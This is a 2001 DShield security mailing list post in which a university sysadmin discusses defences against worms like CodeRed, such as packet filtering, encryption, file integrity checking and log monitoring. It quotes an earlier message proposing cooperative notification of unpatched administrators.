[Dshield] Who's doing what

Brian P. Donohue zbd at u.washington.edu
Sat Aug 11 10:31:27 GMT 2001


 
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Short-term, there are lots of things that could be done to reduce all
the so-called hacking that's getting big press theses days. 
Long-term, IP was not originally designed with any thought for
security.  Security needs to be built into protocols at the packet
level.  That's being worked on now, by committee, so I'm going to go
out on a limb & predict that processes related to securing
IP-connected devices will continue to be a source of gainful
employment for many of us for some time to come.

I contend that hackers can't be stopped completely.  However, really
good hackers are relatively rare.  Some simple steps can keep out
those who don't really know what they're doing, and make all of them
work much harder to do what they do.

There are some things that could be done by ISPs.  They don't need to
try to solve all our problems at once, but they might reduce the
signal-to-noise ratio enough to allow us to get more work done.  For
example, they could simply allow all traffic, but subject it to
stateful packet inspection, rejecting malformed headers.  That would
have stopped CodeRed and a number of other buffer overflow exploits
cold.  

I'm not going to hold my breath waiting for this to happen.

There are some things that could be done by OS vendors.  In
particular, they could start using tools long available to avoid
creating software that runs with vulnerable unchecked buffers. 
Microsoft is not the only miscreant here - Sun, other Unix variants,
and Linux all require frequent patching as well.

Again, I'm not going to hold my breath waiting for his to happen.

Filtering packets at the host seems like a good place to start.  IP
wrappers on Unix/Linux, and third-party software on Windows, or IPSec
for those who are in a position to use it.  For home users, there are
also hardware solutions from a variety of vendors - a poor man's
firewall, costing between $75 and $250.  Why allow your system to
communicate with other computers without approving it (by configuring
packet filters)?  Most packet-filtering software slows down port
scanning, frustrating the hacker, and raising the bar on skill needed
to defeat those defenses.  It also requires the hacker to have the
skill to defeat the packet filters.

Encrypting traffic between the systems that you do allow to talk to
each other makes it harder for the hacker that backdoors a system
near you & installs a packet sniffer.  This is a weak area in terms
of software development right now.  ssh keeps getting hacked, and
encrypting traffic between Windows systems is not a task for novices.

Using tools that tell you when system files change, like tripwire,
can alert you to an intrusion when some jerk does slip by other
defenses.

Monitoring logs helps, too, if you turn them on.

There's also a lot of software out there that can be used to analyze
systems for vulnerabilities.  Most of it will tell you how to fix the
problems.

Securing file systems properly prevents the more trivial intrusions. 
Securing shared network resources is another little step along the
path.

In Windows NT/2000, setting up system policies to be as restrictive
as possible while still allowing you to provide services and do work
will further waste the time of the hacker trying to compromise your
system.

I really could carry on for a while, but I'd rather not.  Most of the
readers herein know that there are many other things I didn't
mention.  The point of this rambling dissertation is, hackers have
cost many of us a great deal of time and sleepless nights for no
particular reason.  We should try to return the favor & waste some of
their time.

Sadly, computing security can't really be automated.  There still
needs to be someone around a computer with a solid understanding of
what it does and why in order to successfully secure it.  I work in
an educational environment where those who buy computers often don't
budget for their administration.  There are probably millions of
clueless home users out there getting access to enough bandwidth to
make their systems good hacker tools.  These kind of problems won't
be solved soon, so all we can do as sysadmins is cover our own little
patches of turf as best we can.

My big nightmare is not the author of CodeRed, or the SirCam virus,
or the IISadmin web defacement exploit.  These are recreational
terrorists whose exploits, while receiving plenty of press, are in
the end just an inconvenience (albeit sometimes costly).  My worry is
that pretty good programmer out there who is interested in
unauthorized access to my systems for profit.  That hacker will be
well-motivated to pass unnoticed through my systems, finding ways to
turn his skills into cash.  I want to focus on catching the
night-crawlers, not on chasing after an ethernet fireworks show.

- -----Original Message-----
From: dshield-admin at dshield.org [mailto:dshield-admin at dshield.org]On
Behalf Of Samuel
Sent: Friday, August 10, 2001 2:28 PM
To: Dshield at Dshield. Org
Subject: [Dshield] Who's doing what


Has anyone determined what other organizations are taking action
against the
worms, and what those actions are? There is a lot of discussion
within this
mailing list of what to do but I think it would be better to work
with as
many other organizations as possible and to include them and be
included
with them in discussions of what to do. I agree that it would be
better to
develop more long-term solutions whenever possible.

I think that with more long-term solutions developed in cooperation
with
other organizations, especially standards and enforcement
organizations, if
there is cooperation from internet users is needed, then the media
could be
used very effectively. If the potential damage could be explained
dramatically and if actual solutions could be provided clearly, then
they
will likely bombard everyone with the information enough to satisfy
everyone
in this group at least.

I am not talking about the problem of IIS systems being vulnerable,
in which
the solution is to apply the patch from IBM. The problem I am talking
about
is the problem of adminstrators that do nto apply the patch and the
systems
that have been infected as a result. Sample short-term solutions are
(1)
using the worm against itself to apply the patch (2) members of this
group
emailing the administrators notifiation of the problem. Sample
long-term
solutions would be (1) revise the standards to require that domain
name
information include a mechanism for this type of thing (2) establish
an
organization officially responsible for notifying system
administrators of a
problem affecting the internet in general (3) establish an official
procedure responsible for notification of system administrators of a
problem
affecting the internet in general.


_______________________________________________
Dshield mailing list
Dshield at dshield.org
To change your subscription options (or unsubscribe), see:
http://www1.dshield.org/mailman/listinfo/dshield

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>

iQA/AwUBO3UJeEZz540guc7SEQKLTwCdGzalrjmRJ8/yB9YfCSfaPtv437QAni8j
seM6btQHhm1qJ4qoDYwO28fv
=SN0a
-----END PGP SIGNATURE-----




More information about the list mailing list